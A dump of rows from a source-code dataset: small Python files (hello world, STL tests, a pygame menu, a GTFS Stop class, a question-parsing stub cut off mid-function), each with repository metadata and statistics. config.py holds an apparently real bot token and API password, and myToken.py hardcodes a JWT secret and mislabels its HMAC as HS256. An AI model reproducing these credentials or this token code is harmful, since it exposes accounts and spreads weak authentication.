| 21.571429 | 56 | 0.784768 | 26 | 302 | 8.961538 | 0.615385 | 0.085837 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.135762 | 302 | 13 | 57 | 23.230769 | 0.89272 | 0 | 0 | 0 | 0 | 0 | 0.102649 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0.125 | 0.25 | 0 | 0.75 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 3 |
8cbf9a2f6a265e3c96cfc57e24874702176aed23 | 54 | py | Python | ScriperSol/Scriper.UnitTests/Assets/helloWord.py | gitter-badger/Scriper | cdd67687f7942916c28658fc950b49c9f3b064cd | [
"MIT"
] | null | null | null | ScriperSol/Scriper.UnitTests/Assets/helloWord.py | gitter-badger/Scriper | cdd67687f7942916c28658fc950b49c9f3b064cd | [
"MIT"
] | null | null | null | ScriperSol/Scriper.UnitTests/Assets/helloWord.py | gitter-badger/Scriper | cdd67687f7942916c28658fc950b49c9f3b064cd | [
"MIT"
] | null | null | null | print("Hello World.")
for x in range(10):
print(x) | 18 | 21 | 0.62963 | 10 | 54 | 3.4 | 0.8 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.045455 | 0.185185 | 54 | 3 | 22 | 18 | 0.727273 | 0 | 0 | 0 | 0 | 0 | 0.218182 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.666667 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 3 |
8cd26494368d915f2cb7c63ef89c9c0cf97f2f81 | 341 | py | Python | tests/stl/test.py | AFlyingCar/EPYGen | 63154c3882db3d489b03abe4a47a68e436a14fad | [
"MIT"
] | null | null | null | tests/stl/test.py | AFlyingCar/EPYGen | 63154c3882db3d489b03abe4a47a68e436a14fad | [
"MIT"
] | null | null | null | tests/stl/test.py | AFlyingCar/EPYGen | 63154c3882db3d489b03abe4a47a68e436a14fad | [
"MIT"
] | null | null | null |
import STL
print("===================")
stl_vec = STL.GetVector()
for i in stl_vec:
print(i)
print("===================")
stl_map = STL.GetMap()
for i in stl_map:
print(i)
print("===================")
stl_str = STL.GetString()
print(stl_str)
print("===================")
stl_tup = STL.GetTuple()
for i in stl_tup:
print(i)
| 14.826087 | 28 | 0.498534 | 46 | 341 | 3.521739 | 0.304348 | 0.246914 | 0.111111 | 0.166667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.152493 | 341 | 22 | 29 | 15.5 | 0.560554 | 0 | 0 | 0.4375 | 0 | 0 | 0.224189 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.0625 | 0 | 0.0625 | 0.5 | 0 | 0 | 0 | null | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 3 |
8ce0b58137f5aebe3d68e56ab22824148e09f6c2 | 113 | py | Python | core/config.py | dorofeichik/FastAPI_book_store | d3a1eebff6d19f453f3b2725c76d84a0e6baf604 | [
"MIT"
] | null | null | null | core/config.py | dorofeichik/FastAPI_book_store | d3a1eebff6d19f453f3b2725c76d84a0e6baf604 | [
"MIT"
] | null | null | null | core/config.py | dorofeichik/FastAPI_book_store | d3a1eebff6d19f453f3b2725c76d84a0e6baf604 | [
"MIT"
] | null | null | null | class Settings:
PROJECT_TITLE: str = "Book store"
PROJECT_VERSION: str = "0.1.1"
settings = Settings()
| 16.142857 | 37 | 0.663717 | 15 | 113 | 4.866667 | 0.666667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.033708 | 0.212389 | 113 | 6 | 38 | 18.833333 | 0.786517 | 0 | 0 | 0 | 0 | 0 | 0.132743 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0.75 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 3 |
8cf9fe75f92dbd48897b4386285e503d87e0695a | 278 | py | Python | menu.py | cosgais/Game | 9b65600e7abde92aed22e08f9a3e18e637fdb475 | [
"MIT"
] | null | null | null | menu.py | cosgais/Game | 9b65600e7abde92aed22e08f9a3e18e637fdb475 | [
"MIT"
] | null | null | null | menu.py | cosgais/Game | 9b65600e7abde92aed22e08f9a3e18e637fdb475 | [
"MIT"
] | null | null | null | import pygame
from pygame.locals import *
class Menu:
def __init__(self):
#self.start = pygame.image.load('racecar.png')
pass
def update(self, dt):
pass
def draw(self, screen):
pygame.draw.rect(screen, (0,0,255), (200,150,100,50)) | 19.857143 | 61 | 0.604317 | 39 | 278 | 4.205128 | 0.666667 | 0.085366 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.077295 | 0.255396 | 278 | 14 | 61 | 19.857143 | 0.714976 | 0.161871 | 0 | 0.222222 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | false | 0.222222 | 0.222222 | 0 | 0.666667 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 3 |
8cfa13d804127a246f5ff929e346844b2917e76e | 716 | py | Python | myToken.py | MantouOwO/109topic | b872e9ad4ab0f07fc334de2d317172f3bb2e1002 | [
"Apache-2.0"
] | null | null | null | myToken.py | MantouOwO/109topic | b872e9ad4ab0f07fc334de2d317172f3bb2e1002 | [
"Apache-2.0"
] | null | null | null | myToken.py | MantouOwO/109topic | b872e9ad4ab0f07fc334de2d317172f3bb2e1002 | [
"Apache-2.0"
] | null | null | null | import time
import base64
import hmac
#參考資料:https://medium.com/mr-efacani-teatime/%E6%B7%BA%E8%AB%87jwt%E7%9A%84%E5%AE%89%E5%85%A8%E6%80%A7%E8%88%87%E9%81%A9%E7%94%A8%E6%83%85%E5%A2%83-301b5491b60e
secret_key = 'mantou'
def toBytes(string):
return bytes(string,'utf-8')
def encodeBase64(text):
return base64.urlsafe_b64encode(text).replace(b'=',b'')
def creat_jwt(id):
header = '{"alg":"HS256","typ":"JWT"}'
payload = '{"user":' + id +',"login_time":' + str(time.time()) +'}'
#jwt = header.payload
jwt = encodeBase64(toBytes(header)) + toBytes('.') + encodeBase64(toBytes(payload))
hs256 = hmac.new(toBytes(secret_key), jwt).digest()
return encodeBase64(hs256).decode("utf-8")
| 28.64 | 159 | 0.666201 | 111 | 716 | 4.252252 | 0.594595 | 0.016949 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.120827 | 0.121508 | 716 | 24 | 160 | 29.833333 | 0.629571 | 0.248603 | 0 | 0 | 0 | 0 | 0.127341 | 0.050562 | 0 | 0 | 0 | 0 | 0 | 1 | 0.214286 | false | 0 | 0.214286 | 0.142857 | 0.642857 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 3 |
50674381b46a1c8f20d043b2be20542b2da87756 | 7,396 | py | Python | aequilibrae/transit/gtfs/stop.py | Art-Ev/aequilibrae | 9f438278e09c875717779bfcc99bf7ba75ed1372 | [
"MIT"
] | 82 | 2018-07-18T09:58:21.000Z | 2022-03-30T15:36:25.000Z | aequilibrae/transit/gtfs/stop.py | Art-Ev/aequilibrae | 9f438278e09c875717779bfcc99bf7ba75ed1372 | [
"MIT"
] | 197 | 2018-06-30T07:01:46.000Z | 2022-03-30T06:30:43.000Z | aequilibrae/transit/gtfs/stop.py | Art-Ev/aequilibrae | 9f438278e09c875717779bfcc99bf7ba75ed1372 | [
"MIT"
] | 29 | 2018-07-16T18:10:39.000Z | 2022-03-30T15:36:26.000Z | class Stop:
"""
Represents each one of the physical stops in a GTFS dataset (from https://developers.google.com/transit/gtfs/reference/)
Fields
______
* **id** `(stop_id)` **Required** - The stop_id field contains an ID that uniquely identifies a stop, station, or station entrance. Multiple routes may use the same stop. The stop_id is used by systems as an internal identifier of this record (e.g., primary key in database), and therefore the stop_id must be dataset unique.
* **code** `(stop_code)` **Optional** - The stop_code field contains short text or a number that uniquely identifies the stop for passengers. Stop codes are often used in phone-based transit information systems or printed on stop signage to make it easier for riders to get a stop schedule or real-time arrival information for a particular stop. The stop_code field contains short text or a number that uniquely identifies the stop for passengers. The stop_code can be the same as stop_id if it is passenger-facing. This field should be left blank for stops without a code presented to passengers.
* **name** `(stop_name)` **Required** - The stop_name field contains the name of a stop, station, or station entrance. Please use a name that people will understand in the local and tourist vernacular.
* **desc** `(stop_desc)` **Optional** - The stop_desc field contains a description of a stop. Please provide useful, quality information. Do not simply duplicate the name of the stop.
* **lat** `(stop_lat)` **Required** - The stop_lat field contains the latitude of a stop, station, or station entrance. The field value must be a valid WGS 84 latitude.
* **lon** `(stop_lon)` **Required** - The stop_lon field contains the longitude of a stop, station, or station entrance. The field value must be a valid WGS 84 longitude value from -180 to 180.
* **zone_id** `(zone_id)` **Optional** - The zone_id field defines the fare zone for a stop ID. Zone IDs are required if you want to provide fare information using fare_rules.txt. If this stop ID represents a station, the zone ID is ignored.
* **url** `(stop_url)` **Optional** - The stop_url field contains the URL of a web page about a particular stop. This should be different from the agency_url and the route_url fields. The value must be a fully qualified URL that includes http:// or https://, and any special characters in the URL must be correctly escaped. See http://www.w3.org/Addressing/URL/4_URI_Recommentations.html for a description of how to create fully qualified URL values.
* **location_type** `(location_type)` **Optional** - The location_type field identifies whether this stop ID represents a stop, station, or station entrance. If no location type is specified, or the location_type is blank, stop IDs are treated as stops. Stations may have different properties from stops when they are represented on a map or used in trip planning. The location type field can have the following values:
- 0 or blank - Stop. A location where passengers board or disembark from a transit vehicle.
- 1 - Station. A physical structure or area that contains one or more stop.
- 2 - Station Entrance/Exit. A location where passengers can enter or exit a station from the street. The stop entry must also specify a parent_station value referencing the stop ID of the parent station for the entrance.
* **parent_station** `(parent_station)` **Optional** - For stops that are physically located inside stations, the parent_station field identifies the station associated with the stop. To use this field, stops.txt must also contain a row where this stop ID is assigned location type=1.
This stop ID represents... This entry's location type... This entry's parent_station field contains...
A stop located inside a station. 0 or blank The stop ID of the station where this stop is located. The stop referenced by parent_station must have location_type=1.
A stop located outside a station. 0 or blank A blank value. The parent_station field doesn't apply to this stop.
A station. 1 A blank value. Stations can't contain other stations.
* **timezone** `(stop_timezone)` **Optional** - The stop_timezone field contains the timezone in which this stop, station, or station entrance is located. Please refer to Wikipedia List of Timezones for a list of valid values. If omitted, the stop should be assumed to be located in the timezone specified by agency_timezone in agency.txt. When a stop has a parent station, the stop is considered to be in the timezone specified by the parent station's stop_timezone value. If the parent has no stop_timezone value, the stops that belong to that station are assumed to be in the timezone specified by agency_timezone, even if the stops have their own stop_timezone values. In other words, if a given stop has a parent_station value, any stop_timezone value specified for that stop must be ignored. Even if stop_timezone values are provided in stops.txt, the times in stop_times.txt should continue to be specified as time since midnight in the timezone specified by agency_timezone in agency.txt. This ensures that the time values in a trip always increase over the course of a trip, regardless of which timezones the trip crosses.
* **wheelchair_boarding** `(wheelchair_boarding)` **Optional** - The wheelchair_boarding field identifies whether wheelchair boardings are possible from the specified stop, station, or station entrance. The field can have the following values:
- 0 (or empty) - indicates that there is no accessibility information for the stop
- 1 - indicates that at least some vehicles at this stop can be boarded by a rider in a wheelchair
- 2 - wheelchair boarding is not possible at this stop
When a stop is part of a larger station complex, as indicated by a stop with a parent_station value, the stop's wheelchair_boarding field has the following additional semantics:
- 0 (or empty) - the stop will inherit its wheelchair_boarding value from the parent station, if specified in the parent
- 1 - there exists some accessible path from outside the station to the specific stop / platform
- 2 - there exists no accessible path from outside the station to the specific stop / platform
For station entrances, the wheelchair_boarding field has the following additional semantics:
- 0 (or empty) - the station entrance will inherit its wheelchair_boarding value from the parent station, if specified in the parent
- 1 - the station entrance is wheelchair accessible (e.g. an elevator is available to platforms if they are not at-grade)
- 2 - there exists no accessible path from the entrance to station platforms
"""
def __init__(self):
"""
Initializes the class with members corresponding to all fields in the GTFS specification. See Stop class
documentation
"""
self.id = None
self.code = ""
self.name = None
self.desc = ""
self.lat = None
self.lon = None
self.zone_id = None
self.url = None
self.location_type = 0
self.parent_station = None
self.timezone = None
self.wheelchair_boarding = 0
| 104.169014 | 1,135 | 0.73729 | 1,155 | 7,396 | 4.658009 | 0.238095 | 0.032528 | 0.016915 | 0.026022 | 0.237361 | 0.205576 | 0.194796 | 0.16171 | 0.149442 | 0.149442 | 0 | 0.005295 | 0.208356 | 7,396 | 70 | 1,136 | 105.657143 | 0.913578 | 0.92861 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.071429 | false | 0 | 0 | 0 | 0.142857 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 3 |
50810014044e376cd798e0b655725ed6b38c7100 | 513 | py | Python | peas/tests/serial_handlers/__init__.py | zacharyt20/POCS | 8f785eaf27178be7d72106cb82e5400a8b852ba8 | [
"MIT"
] | 1 | 2019-07-19T10:37:08.000Z | 2019-07-19T10:37:08.000Z | peas/tests/serial_handlers/__init__.py | zacharyt20/POCS | 8f785eaf27178be7d72106cb82e5400a8b852ba8 | [
"MIT"
] | null | null | null | peas/tests/serial_handlers/__init__.py | zacharyt20/POCS | 8f785eaf27178be7d72106cb82e5400a8b852ba8 | [
"MIT"
] | null | null | null | """The protocol_*.py files in this package are based on PySerial's file
test/handlers/protocol_test.py, modified for different behaviors. The call
serial.serial_for_url("XYZ://") looks for a class Serial in a file named protocol_XYZ.py in this
package (i.e. directory).
This package init file will be loaded as part of searching for a protocol handler in this package.
It is important to use root-relative imports (e.g. relative to the POCS directory) so that all
modules and packages are loaded only once.
"""
| 51.3 | 98 | 0.779727 | 90 | 513 | 4.388889 | 0.633333 | 0.111392 | 0.098734 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.152047 | 513 | 9 | 99 | 57 | 0.908046 | 0.984405 | 0 | null | 0 | null | 0 | 0 | null | 0 | 0 | 0 | null | 1 | null | true | 0 | 0 | null | null | null | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 3 |
5099f9429d6aaec98c0839fa882d53d23aca776a | 198 | py | Python | annotation_pipline/get_plaintext.py | d-e-h-i-o/bachelor_thesis | 64bc5fb2c65621f7a8265bade0328d3f8c950ff3 | [
"MIT"
] | 1 | 2021-12-20T12:56:32.000Z | 2021-12-20T12:56:32.000Z | annotation_pipline/get_plaintext.py | DFKI-NLP/covid19-law-matching | c704a926977ef5f7fd4867125a2e79f352efd163 | [
"MIT"
] | null | null | null | annotation_pipline/get_plaintext.py | DFKI-NLP/covid19-law-matching | c704a926977ef5f7fd4867125a2e79f352efd163 | [
"MIT"
] | 1 | 2021-11-24T11:21:33.000Z | 2021-11-24T11:21:33.000Z | from newsplease import NewsPlease
from retry import retry
@retry(tries=3, delay=2)
def fetch_plaintext(url: str) -> str:
article = NewsPlease.from_url(url)
return article.maintext or ""
| 18 | 38 | 0.732323 | 28 | 198 | 5.107143 | 0.607143 | 0.195804 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.012195 | 0.171717 | 198 | 10 | 39 | 19.8 | 0.859756 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.166667 | false | 0 | 0.333333 | 0 | 0.666667 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 3 |
50b0514371c1dbff0f0ec3521d33eb97209177c7 | 83 | py | Python | paths.py | yonlif/CitySimulator | ca0d0de41cc37ef17f22af2c1a329319d2dbbeb2 | [
"Apache-2.0"
] | null | null | null | paths.py | yonlif/CitySimulator | ca0d0de41cc37ef17f22af2c1a329319d2dbbeb2 | [
"Apache-2.0"
] | null | null | null | paths.py | yonlif/CitySimulator | ca0d0de41cc37ef17f22af2c1a329319d2dbbeb2 | [
"Apache-2.0"
] | null | null | null | from pathlib import Path
NYC_DATA_PATH = Path('data') / 'CSCL_PUB_Centerline.csv'
| 20.75 | 56 | 0.771084 | 13 | 83 | 4.615385 | 0.769231 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.120482 | 83 | 3 | 57 | 27.666667 | 0.821918 | 0 | 0 | 0 | 0 | 0 | 0.325301 | 0.277108 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.5 | 0 | 0.5 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 3 |
50c7dd6eac01ba576abe09a2f9031f2911fde971 | 3,261 | py | Python | autodiff/decorators.py | gwtaylor/pyautodiff | 7973e26f1c233570ed4bb10d08634ec7378e2152 | [
"BSD-3-Clause"
] | 59 | 2015-02-03T20:50:59.000Z | 2020-05-26T05:38:54.000Z | autodiff/decorators.py | gwtaylor/pyautodiff | 7973e26f1c233570ed4bb10d08634ec7378e2152 | [
"BSD-3-Clause"
] | 3 | 2015-05-10T06:22:45.000Z | 2016-12-06T02:20:58.000Z | autodiff/decorators.py | gwtaylor/pyautodiff | 7973e26f1c233570ed4bb10d08634ec7378e2152 | [
"BSD-3-Clause"
] | 11 | 2015-04-15T16:52:09.000Z | 2017-06-28T12:10:39.000Z | from autodiff.symbolic import Symbolic, Function, Gradient, HessianVector
import collections
def function(fn=None, **kwargs):
"""
Wraps a function with an AutoDiff Function instance, converting it to a
symbolic representation.
The function is compiled the first time it is called.
Use:
@function
def python_function(...):
return do_something()
python_function(...) # calls compiled Function
Pass keywords to Function:
@function(force_floatX=True):
def python_function(x=1, y=2):
return do_something()
"""
if isinstance(fn, collections.Callable):
return Function(fn, **kwargs)
else:
def function_wrapper(pyfn):
return Function(pyfn, **kwargs)
return function_wrapper
def gradient(fn=None, **kwargs):
"""
Wraps a function with an AutoDiff Gradient instance, converting it to a
symbolic representation that returns the derivative with respect to either
all inputs or a subset (if specified with the 'wrt' keyword).
The function is compiled the first time it is called.
Use:
@gradient
def python_function(...):
return do_something()
python_function(...) # returns the gradient of python_function
Pass keywords to Gradient:
@gradient(wrt = ['x', 'y'])
def python_function(x=1, y=2):
return do_something()
"""
if isinstance(fn, collections.Callable):
return Gradient(fn, **kwargs)
else:
def gradient_wrapper(pyfn):
return Gradient(pyfn, **kwargs)
return gradient_wrapper
def hessian_vector(fn=None, **kwargs):
"""
Wraps a function with an AutoDiff HessianVector instance, converting it to
a symbolic representation that returns the result with respect to either
all inputs or a subset (if specified with the 'wrt' keyword). A tuple of
the required vectors must be passed to the resulting function with the
keyword '_vectors'.
The function is compiled the first time it is called.
Use:
@gradient
def python_function(...):
return do_something()
python_function(...) # returns the gradient of python_function
Pass keywords to Gradient:
@gradient(wrt = ['x', 'y'])
def python_function(x=1, y=2):
return do_something()
"""
if isinstance(fn, collections.Callable):
return HessianVector(fn, **kwargs)
else:
def hv_wrapper(pyfn):
return HessianVector(pyfn, **kwargs)
return hv_wrapper
def as_symbolic(fn=None, **kwargs):
"""
Wraps a function with an AutoDiff Symbolic instance, meaning it will act
as a function expecting and operating on Theano objects.
The function is not compiled.
Use:
@as_symbolic
def python_function(...):
return do_something()
python_function(...) # calls function as if it worked with Theano objs
"""
if isinstance(fn, collections.Callable):
return Symbolic(fn, **kwargs)
else:
def function_wrapper(pyfn):
return Symbolic(pyfn, **kwargs)
return function_wrapper
theanify = as_symbolic | 27.871795 | 78 | 0.641214 | 391 | 3,261 | 5.26087 | 0.219949 | 0.088478 | 0.057851 | 0.033058 | 0.660671 | 0.63053 | 0.61157 | 0.589694 | 0.550802 | 0.421488 | 0 | 0.002537 | 0.274762 | 3,261 | 117 | 79 | 27.871795 | 0.86723 | 0.588163 | 0 | 0.387097 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.258065 | false | 0 | 0.064516 | 0.129032 | 0.709677 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 3 |
50cc80f625a434563d8bd32aa69e002c8f433cbc | 131 | py | Python | config.py | pythonjsgo/mail_tracking_bot | a541fed67b1b85f912088e0c4920ff9f6dabf5bb | [
"MIT"
] | null | null | null | config.py | pythonjsgo/mail_tracking_bot | a541fed67b1b85f912088e0c4920ff9f6dabf5bb | [
"MIT"
] | null | null | null | config.py | pythonjsgo/mail_tracking_bot | a541fed67b1b85f912088e0c4920ff9f6dabf5bb | [
"MIT"
] | null | null | null | TOKEN = "1807234388:AAHbvU9Crr6BURnLMwT8m4hrneGgxGvbm8A"
pochta_api_login = "YadBdduZvCLDvZ"
pochta_api_password = "oAD8k3MpRHq5" | 26.2 | 56 | 0.847328 | 11 | 131 | 9.727273 | 0.818182 | 0.168224 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.14876 | 0.076336 | 131 | 5 | 57 | 26.2 | 0.735537 | 0 | 0 | 0 | 0 | 0 | 0.545455 | 0.348485 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0.333333 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 3 |
50cfd74d5dd92f459fa4e1ff1f665cd51c057e1f | 334 | py | Python | migrations/versions/0209_add_cancelled_status.py | tlwr/notifications-api | 88a6b7729edb9be41ce3e7c027f1452b7b6d00d2 | [
"MIT"
] | 51 | 2016-04-03T23:36:17.000Z | 2022-03-21T20:04:52.000Z | migrations/versions/0209_add_cancelled_status.py | tlwr/notifications-api | 88a6b7729edb9be41ce3e7c027f1452b7b6d00d2 | [
"MIT"
] | 1,335 | 2015-12-15T14:28:50.000Z | 2022-03-30T16:24:27.000Z | migrations/versions/0209_add_cancelled_status.py | tlwr/notifications-api | 88a6b7729edb9be41ce3e7c027f1452b7b6d00d2 | [
"MIT"
] | 30 | 2016-01-08T19:05:32.000Z | 2021-12-20T16:37:23.000Z | """
Revision ID: 0209_add_cancelled_status
Revises: 84c3b6eb16b3
Create Date: 2018-07-31 13:34:00.018447
"""
from alembic import op
revision = '0209_add_cancelled_status'
down_revision = '84c3b6eb16b3'
def upgrade():
op.execute("INSERT INTO notification_status_types (name) VALUES ('cancelled')")
def downgrade():
pass
| 16.7 | 83 | 0.748503 | 44 | 334 | 5.477273 | 0.75 | 0.058091 | 0.13278 | 0.182573 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.146341 | 0.140719 | 334 | 19 | 84 | 17.578947 | 0.69338 | 0.299401 | 0 | 0 | 0 | 0 | 0.455357 | 0.223214 | 0 | 0 | 0 | 0 | 0 | 1 | 0.285714 | false | 0.142857 | 0.142857 | 0 | 0.428571 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 3 |
50d3d8bef2a89f7fd1535b32b328c27fd6cea66d | 769 | py | Python | variation/translators/polypeptide_truncation.py | cancervariants/varlex | 3806317fa0125c3098e80124d5169fe6a13d50db | [
"MIT"
] | null | null | null | variation/translators/polypeptide_truncation.py | cancervariants/varlex | 3806317fa0125c3098e80124d5169fe6a13d50db | [
"MIT"
] | 15 | 2019-10-23T17:35:42.000Z | 2020-05-05T21:04:01.000Z | variation/translators/polypeptide_truncation.py | cancervariants/varlex | 3806317fa0125c3098e80124d5169fe6a13d50db | [
"MIT"
] | null | null | null | """Module for Polypeptide Truncation Translation."""
from variation.translators.translator import Translator
from variation.schemas.classification_response_schema import ClassificationType
from variation.schemas.token_response_schema import PolypeptideTruncationToken, Token
class PolypeptideTruncation(Translator):
"""The Polypeptide Truncation Translator class."""
def can_translate(self, type: ClassificationType) -> bool:
"""Return if classification type is Polypeptide Truncation."""
return type == ClassificationType.POLYPEPTIDE_TRUNCATION
def is_token_instance(self, token: Token) -> bool:
"""Return if the token is an Polypeptide Truncation token instance."""
return isinstance(token, PolypeptideTruncationToken)
| 45.235294 | 85 | 0.782835 | 77 | 769 | 7.714286 | 0.415584 | 0.176768 | 0.06734 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.141743 | 769 | 16 | 86 | 48.0625 | 0.9 | 0.276983 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.25 | false | 0 | 0.375 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 3 |
0fd606c0d74b41773b151cbc194b805f0ebef5a6 | 8,818 | py | Python | load_d2c_data/question_to_fields_final_perfect.py | 0bserver07/neural-engineers-first-attempt | 19760251b7080ffe2e7b15146af6844811da4141 | [
"MIT"
] | 10 | 2017-09-10T14:42:36.000Z | 2020-12-03T11:45:17.000Z | load_d2c_data/question_to_fields_final_perfect.py | 0bserver07/neural-engineers-first-attempt | 19760251b7080ffe2e7b15146af6844811da4141 | [
"MIT"
] | null | null | null | load_d2c_data/question_to_fields_final_perfect.py | 0bserver07/neural-engineers-first-attempt | 19760251b7080ffe2e7b15146af6844811da4141 | [
"MIT"
] | 7 | 2017-10-03T04:43:50.000Z | 2020-09-23T14:39:27.000Z | # -*- coding: utf-8 -*-
import string
import segtok.segmenter
import segtok.tokenizer
from segtok.tokenizer import symbol_tokenizer, word_tokenizer, web_tokenizer
from segtok.tokenizer import split_possessive_markers, split_contractions
'''ADD SECTION FOR CONVERTING EVERYTHING TO LOWER CASE'''
q = '''Description: ¶ Name string is a string consisting of letters "R","K" and "V". Today Oz wants to design a name string in a beautiful manner. Actually Oz's cannot insert these three letters arbitrary anywhere ,he has to follow some rules to make the name string look beautiful. First thing is that the name string should consist of at most two different letters. Secondly adjacent letters in name string must be different. ¶ ¶ After this procedure Oz wants name string to be as long as possible. Given the number of "R","K" and "V" letters that you have initially ,help Oz to find the maximum length of name string that Oz can make. ¶ ¶ Input : ¶ The first line contains the number of test cases T. Each test case consists of three space separated integers - A,B and C representing number of "R" letters, number of "K" letters and number of "V" letters respectively. ¶ ¶ Output : ¶ For each test case T, output maximum length of name string that Oz can make. ¶ ¶ Constraints : ¶ 1 ≤ T ≤100 ¶ 0 ≤ A,B,C ≤10^6 ¶ ¶ SAMPLE INPUT ¶ 2 ¶ 1 2 asfas 5 ¶ 0 0 2 ¶ ¶ SAMPLE OUTPUT ¶ 5 ¶ 1 ¶ ¶ Explanation ¶ ¶ For first sample : ¶ The longest name string possible is : VKVKV using 3 "V" letters and 2 "K" letters and its length is 5.'''
def char_split_if_io_example(sentence):
